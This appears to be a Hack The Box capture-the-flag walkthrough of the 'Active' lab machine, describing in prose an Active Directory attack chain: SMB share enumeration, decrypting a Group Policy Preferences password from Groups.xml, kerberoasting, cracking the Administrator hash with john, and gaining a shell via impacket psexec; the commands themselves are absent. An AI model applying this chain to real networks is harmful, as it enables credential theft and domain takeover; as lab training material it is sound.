Active — HTB Walkthrough

ENUMERATION

Nmap scan

LDAP Enumeration

Got nothing juicy in ldapsearch.

Enum4Linux

We see replication share in SMB enum done by enum4linux.

Directly smbclient login doesn’t work, so we will try to access replication using smbclient

Now we know, Groups.xml if left unattended can store passwords . Lets get the file to our system and see contents

On smbclient

On attacker machine

Great we see we have password of svc-tgs, ticket granting system may be ?? So I first tried to pass it to winrm directly as Hash, but it didn’t work so we need to decrypt it anyhow

1) You can do this using kali tool gpp-decrypt for Kali

BustedSec/gpp-decrypt

OR

2) Get-GPPassword.ps1 for windows

I did using kali as follows

Username: SVC_TGS && Password : GPPstillStandingStrong2k18

Trying SMB login worked

It gave us User.txt

get user.txt to your machine

EXPLOITATION

Now as hinted by name it is service ticket granting service account. Why not just try kerberoasting ???

Let’s crack the administrator hash we got using john

use rockyou.txt as wordlist

Password is Tickermaster1968 for Administrator

I used psexec.py from impacket

we are root , you can get root flag at C:/Users/Administrator/Desktop/root.txt

ROOTED!!!!